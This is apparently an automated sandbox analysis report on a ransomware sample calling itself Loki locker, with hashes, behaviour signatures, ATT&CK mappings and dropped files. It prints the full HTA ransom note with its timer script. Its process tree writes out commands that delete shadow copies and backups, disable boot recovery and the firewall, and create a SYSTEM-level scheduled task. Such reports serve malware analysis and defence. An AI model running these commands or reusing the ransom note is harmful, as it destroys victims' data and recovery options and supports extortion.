Overview

overview

10

Static

static

10

2024-10-25...ry.exe

windows7-x64

10

2024-10-25...ry.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    106s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-10-2024 04:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe

  • Size

    520KB

  • MD5

    9da2c0bd42d714d127f2756671426972

  • SHA1

    e879856aa0d650acc31de610f6de30e70efbee7b

  • SHA256

    3006f4700c203366244df77f5f45caae705d79540c65769bd71292eba0fbe7d2

  • SHA512

    b5a353809f6076f3effc865c70cabc0079fb01612e08afb14a7947827e3a3149f2e2ba415fce949670065d4e8530e6d243f42e4037a6f871fde027f6a0840229

  • SSDEEP

    6144:k9iBKeyvrf7JR4CDFudez0e9YaVX0cBdxLPlk3XrvPVdNT6zncVUJKWehinom6r4:crDQ0FXzWazdxWrlTT6zncVUJ7vnd6r4

Score
10/10
neshtadefense_evasiondiscoveryevasionexecutionimpactpersistenceprivilege_escalationransomwarespywarestealertrojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\info.hta

Ransom Note
<html> <head> <title>Loki locker</title> <HTA:APPLICATION ICON='msiexec.exe' WINDOWSTATE="maximize" SINGLEINSTANCE='yes' SysMenu="no" contextmenu="no" scroll="yes"/> <meta http-equiv="x-ua-compatible" content="IE=9"/> </head> <style type="text/css"> body{background-color: #000000; font-family: Arial, Helvetica, sans-serif;}#t{text-align: center; color: #FF0000; font-weight: bold; font-size: 1.51vw; margin-bottom: 0;}p{text-align: center; font-size: 1vw; color: white; margin-bottom: 0;}.t{text-align: left; margin-left: 2px;}.pt{color: white; font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; font-size: 1.1vw;}.b{padding: 2px; outline: none;}ul{font-size: 1vw;}.m{background: rgb(189, 54, 54); padding: 1px 5px; font-weight: bold;}#tm{color: red; text-align: center; border-bottom: 0; font-size: 2vw;}</style> <script>var countDownDate = new Date(2024,10,24,4,41,18).getTime(); var x = setInterval(function () { var now = new Date().getTime(); var distance = countDownDate - now; var days = Math.floor(distance / (1000 * 60 * 60 * 24)); var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60)); var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60)); var seconds = Math.floor((distance % (1000 * 60)) / 1000); document.getElementById("tm").innerHTML = days + "d," + hours + ":" + minutes + ":" + seconds + " LEFT TO LOSE ALL OF YOUR FILES"; if (distance < 0) { clearInterval(x); document.getElementById("tm").innerHTML = "TIMER IS UP.SAY BYE TO YOUR FILES :)"; WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run("C:\\ProgramData\\winlogon.exe", 1, false);}}, 1000); </script> <body > <h1 id="t">All your files have been encrypted by Loki locker!</h1> <h2 id="tm"></h2> <p>All your files have been encrypted due to a security problem with your PC. <br>If you want to restore them, please send an email <span class="m">[email protected]</span> </p><br><p class="t"> You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. <br>After payment we will send you the decryption tool. <br>You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay <b>Double</b>. <br>In case of no answer in 24 hours (1 Day) write to this email <span class="m">[email protected]</span> <br>Your unique ID is : <span class="m">60C086EC</span> </p><br><div class="b" style="background-color: #FF0000;"> <div class="pt">You only have LIMITED time to get back your files!</div><ul style="color: white; margin-top: 0;"> <li>If timer runs out and you dont pay us , all of files will be DELETED and you hard disk will be seriously DAMAGED.</li><li>You will lose some of your data on day 2 in the timer.</li><li>You can buy more time for pay. Just email us.</li><li>THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) </li></ul> </div><br><div class="b" style="background-color: rgb(78, 78, 78);"> <div class="pt">What is our decryption guarantee?</div><ul style="color: white; margin-top: 0;"> <li>Before paying you can send us up to <u>3 test files</u> for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)</li></div><br><div class="b" style="background-color: #FF0000;"> <div class="pt">Attention!</div><ul style="color: white; margin-top: 0;"> <li><u><b>DO NOT</b> pay any money before decrypting the test files.</u></li><li><u><b>DO NOT</b> trust any intermediary.</u> they wont help you and you may be victim of scam. just email us , we help you in any steps.</li><li><u><b>DO NOT</b> reply to other emails.</u> ONLY this two emails can help you.</li><li>Do not rename encrypted files.</li><li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li><li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li></ul> </div></body> </html>
Emails

class="m">[email protected]</span>

class="m">[email protected]</span>
URLs

http-equiv="x-ua-compatible"

Signatures

  • Detect Neshta payload 4 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
    evasiontrojan
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

    persistencespywareneshta
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Disables Task Manager via registry modification
    evasion
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
    persistence
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops desktop.ini file(s) 28 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Control Panel 2 IoCs
    evasion
  • Modifies registry class 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs
  • System policy modification 1 TTPs 2 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe"
    1⤵
    • Checks computer location settings
    • Modifies system executable filetype association
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4548
    • C:\Users\Admin\AppData\Local\Temp\3582-490\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe"
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Modifies Control Panel
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:1772
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5540
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:5620
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ik4g2jej\ik4g2jej.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5956
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E03.tmp" "c:\ProgramData\CSC7092410443034CA69447916971627D0.TMP"
          4⤵
            PID:3432
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5508
          • C:\Windows\system32\vssadmin.exe
            vssadmin delete shadows /all /quiet
            4⤵
            • Interacts with shadow copies
            PID:3464
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5432
          • C:\Windows\system32\wbadmin.exe
            wbadmin DELETE SYSTEMSTATEBACKUP
            4⤵
            • Deletes System State backups
            PID:2348
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5740
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic shadowcopy delete
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3560
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:472
          • C:\Windows\system32\wbadmin.exe
            wbadmin delete catalog -quiet
            4⤵
            • Deletes backup catalog
            PID:2280
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2192
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} bootstatuspolicy ignoreallfailures
            4⤵
            • Modifies boot configuration data using bcdedit
            PID:4952
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4304
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} recoveryenabled no
            4⤵
            • Modifies boot configuration data using bcdedit
            PID:4636
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:228
          • C:\Windows\system32\netsh.exe
            netsh advfirewall set currentprofile state off
            4⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:1072
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4788
          • C:\Windows\system32\netsh.exe
            netsh firewall set opmode mode=disable
            4⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:3660
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • System Location Discovery: System Language Discovery
          PID:5996
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 1440
            4⤵
            • Program crash
            PID:4736
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2516
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 1336
            4⤵
            • Program crash
            PID:5204
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • System Location Discovery: System Language Discovery
          PID:5456
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 1336
            4⤵
            • Program crash
            PID:5192
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3124
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 332
            4⤵
            • Program crash
            PID:5344
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4056
    • C:\Windows\system32\wbengine.exe
      "C:\Windows\system32\wbengine.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3640
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5072
    • C:\Windows\System32\vdsldr.exe
      C:\Windows\System32\vdsldr.exe -Embedding
      1⤵
        PID:4740
      • C:\Windows\System32\vds.exe
        C:\Windows\System32\vds.exe
        1⤵
        • Checks SCSI registry key(s)
        PID:4752
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5996 -ip 5996
        1⤵
          PID:5276
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2516 -ip 2516
          1⤵
            PID:5164
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5456 -ip 5456
            1⤵
              PID:4876
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3124 -ip 3124
              1⤵
                PID:116
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4056 -ip 4056
                1⤵
                  PID:4624

                Network

                MITRE ATT&CK Enterprise v15

                Reconnaissance

                Resource Development

                Initial Access

                Execution

                Command and Scripting Interpreter

                2
                T1059

                Scheduled Task/Job

                1
                T1053

                Scheduled Task

                1
                T1053.005

                Windows Management Instrumentation

                1
                T1047

                Persistence

                Boot or Logon Autostart Execution

                1
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Create or Modify System Process

                2
                T1543

                Windows Service

                2
                T1543.003

                Event Triggered Execution

                2
                T1546

                Change Default File Association

                1
                T1546.001

                Netsh Helper DLL

                1
                T1546.007

                Scheduled Task/Job

                1
                T1053

                Scheduled Task

                1
                T1053.005

                Privilege Escalation

                Boot or Logon Autostart Execution

                1
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Create or Modify System Process

                2
                T1543

                Windows Service

                2
                T1543.003

                Event Triggered Execution

                2
                T1546

                Change Default File Association

                1
                T1546.001

                Netsh Helper DLL

                1
                T1546.007

                Scheduled Task/Job

                1
                T1053

                Scheduled Task

                1
                T1053.005

                Defense Evasion

                Direct Volume Access

                1
                T1006

                Impair Defenses

                2
                T1562

                Disable or Modify System Firewall

                1
                T1562.004

                Disable or Modify Tools

                1
                T1562.001

                Indicator Removal

                4
                T1070

                File Deletion

                4
                T1070.004

                Modify Registry

                5
                T1112

                Credential Access

                Credentials from Password Stores

                1
                T1555

                Credentials from Web Browsers

                1
                T1555.003

                Unsecured Credentials

                1
                T1552

                Credentials In Files

                1
                T1552.001

                Discovery

                Peripheral Device Discovery

                2
                T1120

                Query Registry

                4
                T1012

                System Information Discovery

                4
                T1082

                System Location Discovery

                1
                T1614

                System Language Discovery

                1
                T1614.001

                Lateral Movement

                Collection

                Data from Local System

                1
                T1005

                Command and Control

                Exfiltration

                Impact

                Defacement

                1
                T1491

                Inhibit System Recovery

                5
                T1490

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE
                  Filesize

                  86KB

                  MD5

                  3b73078a714bf61d1c19ebc3afc0e454

                  SHA1

                  9abeabd74613a2f533e2244c9ee6f967188e4e7e

                  SHA256

                  ded54d1fcca07b6bff2bc3b9a1131eac29ff1f836e5d7a7c5c325ec5abe96e29

                  SHA512

                  75959d4e8a7649c3268b551a2a378e6d27c0bfb03d2422ebeeb67b0a3f78c079473214057518930f2d72773ce79b106fd2d78405e8e3d8883459dcbb49c163c4

                  Download Submit

                • C:\ProgramData\3uct2nhv.exe
                  Filesize

                  32KB

                  MD5

                  24d8285a1eb965b7ae5adf7d569d4fa0

                  SHA1

                  245b356fcfcb8c3d05fc50faed1b25b4ee9a6a15

                  SHA256

                  a757af448c164b3832344d63dfbe4e6cc620b001a3ea5ce8ee08535de6e3b46b

                  SHA512

                  7f662ddf7748a03faf9da50c0f9d5921536042565c66ad958a044cf7abdddde2f1776763a61d9cc58cc7678dbc8136ae74438231edb6008db4d22d6cf639d70a

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\3582-490\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe
                  Filesize

                  480KB

                  MD5

                  dc2d7175e98b8592988849b695c179b1

                  SHA1

                  8061dcc212a3818cafcd5857ddd4fddde605d9df

                  SHA256

                  621736b0a31afd25930f89be064edcdbcd151480ea7f45ee6fa2fdb4c443ee9c

                  SHA512

                  329c5127c92e726c88d969aad32d79450eab3c614446ca4fd2d9e43e4beeec3eb1da2827e0e75629ce2f23770941f8f15e4310ffb532d28d6381143a62287762

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\RES1E03.tmp
                  Filesize

                  29KB

                  MD5

                  9c6754246000ac960c793768d584c747

                  SHA1

                  9eb097e02d81c73618ee04edd100e41c69635ac6

                  SHA256

                  b91a38f46b532c95583114f644669347479d0fa414124f32e505085653a1d7c3

                  SHA512

                  1800e564f9c5e16c0509bbc7d80849b7f39c8df5dbf5d8e026ea089cc737b850c4d4162f746e7fea54adffa3a40790a8a5d358abfb45dfa45dd1b25b77adaef5

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\info.hta
                  Filesize

                  3KB

                  MD5

                  eab668b8557633a6818ddb68c299bd2e

                  SHA1

                  15b810f7157eff057b5901f5536023fd8fce636e

                  SHA256

                  6e59dcc7701953797444e89648d3846d972ed43c87fde531b2ce697b5cca0cdc

                  SHA512

                  0071cbf8d95289198e68775a079d2e153e1a16d2ed06d2121b226f9bf798fe48632f9b1f9c6aac368afe8f5162936578bdf474ddacf8ace19e3c8d037f06c030

                  Download Submit

                • C:\Users\Admin\Desktop\Cpriv.Loki
                  Filesize

                  2KB

                  MD5

                  a30eb463291f2c86d408aaa5aab52262

                  SHA1

                  ed20698517519b13d49a8744d0a232de3bf7e7bd

                  SHA256

                  2b5c07f9399e3b331c4af6fd6ba922f5d490b15199633fdb3bf23704e82cd5c6

                  SHA512

                  92148fa03dd5270ba29e3ba71fd73266293e9b814e9594d0f7e012d90b7265a0b53fe155618dc752b08e5b2ff438632543e0e2900cdf4bc2375e58915dd1b80f

                  Download Submit

                • C:\Users\Admin\Documents\Restore-My-Files.txt
                  Filesize

                  335B

                  MD5

                  01e80cdae0c2c8babc728f2b20a0a3d6

                  SHA1

                  40d7f5a54da5bbd8dcb299b7d940478517702440

                  SHA256

                  89b06c401b92a5b5ab2e223d36bd306f49027a11238f7cb94886e35e48ec02ee

                  SHA512

                  29bf5aa06bd1d2565d6917aa6f1d8fa9d34ac2cd9b7efaef559bb2a283f316d5e998233580ecc9c8882aa20e7d0e34813a05fa00a9a8a2fb22b5b247a7b45a26

                  Download Submit

                • \??\c:\ProgramData\CSC7092410443034CA69447916971627D0.TMP
                  Filesize

                  28KB

                  MD5

                  c9e37ffcaa4295dfb4bab2735a915d8d

                  SHA1

                  84c062568a5b54ba1d3643849a5bf89289d6fb9f

                  SHA256

                  efaf226cdf7cbf59e397178444772dde249cedcc990f4568714d2165907fe6c8

                  SHA512

                  9d5c096a9f29dda6dc1618cbfeb1cef289406b9a24b557e26abe75b18c233ec05f0a29d79ef663a01743fe9fb71325f03e41fb8964791a2026b7f5ea9166410d

                  Download Submit

                • \??\c:\Users\Admin\AppData\Local\Temp\ik4g2jej\ik4g2jej.0.cs
                  Filesize

                  1KB

                  MD5

                  b13ca430c010150409bf9135f8fa3b45

                  SHA1

                  c79083f6c625d77c3c8682f6e0085fd1cc2379f2

                  SHA256

                  68d1e7fa040c4ce855237670de6ee6525786f5666f0eb2e578dffb5fe4427738

                  SHA512

                  ab67cb6a49aecb5c039a540d904ceec3d5b2c0747a728ce15f32a76dc5fb35e076dfab9afb23eed27dda9767f548706980e17b5706dc00dfd9f8df6c59d8266e

                  Download Submit

                • \??\c:\Users\Admin\AppData\Local\Temp\ik4g2jej\ik4g2jej.cmdline
                  Filesize

                  236B

                  MD5

                  fbcd21da75febe8553e60225e5d527e0

                  SHA1

                  4dab6e2d0811b81ff1f83482d6e4dcb9abc87cdb

                  SHA256

                  cc262d7d4cc060d1ef7e937a4e77b792d84636aa13727a08b4b6420dbe283288

                  SHA512

                  0e199d2b3ae38ecd128beb0f0ba396d8d59c0383c5b8da23bb4a53783d2e6395284bcdb85d4871939a8eceab7a642e9210e700ef73cab22abf940d9c665ce54b

                  Download Submit

                • \??\c:\Users\Admin\AppData\Local\Temp\vckxk5dv.ico
                  Filesize

                  27KB

                  MD5

                  dbc49b5f7714255217080c2e81f05a99

                  SHA1

                  4de2ef415d66d2bb8b389ba140a468b125388e19

                  SHA256

                  6d2f1f6164cbd331b9dc43b37948372e21b2ee45407aa99e199693835cded09c

                  SHA512

                  29a65eb7403bfc220fd057c2e6ea11b29bff545dfce2d3370ad462c66b03ae7f648efd480305423a49440de199a2a94c41214877b226a42dc2d1650683d149bb

                  Download Submit

                • memory/1772-16-0x00007FFA7BF20000-0x00007FFA7C9E1000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/1772-103-0x00007FFA7BF20000-0x00007FFA7C9E1000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/1772-102-0x00007FFA7BF23000-0x00007FFA7BF25000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/1772-18-0x00007FFA7BF20000-0x00007FFA7C9E1000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/1772-17-0x00007FFA7BF20000-0x00007FFA7C9E1000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/1772-15-0x00007FFA7BF20000-0x00007FFA7C9E1000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/1772-14-0x000000001BB70000-0x000000001BBE6000-memory.dmp

                  Filesize

                  472KB

                  Download

                • memory/1772-13-0x0000000000080000-0x0000000000102000-memory.dmp

                  Filesize

                  520KB

                  Download

                • memory/1772-12-0x00007FFA7BF23000-0x00007FFA7BF25000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/4548-105-0x0000000000400000-0x000000000041B000-memory.dmp

                  Filesize

                  108KB

                  Download

                • memory/4548-107-0x0000000000400000-0x000000000041B000-memory.dmp

                  Filesize

                  108KB

                  Download

                • memory/4548-104-0x0000000000400000-0x000000000041B000-memory.dmp

                  Filesize

                  108KB

                  Download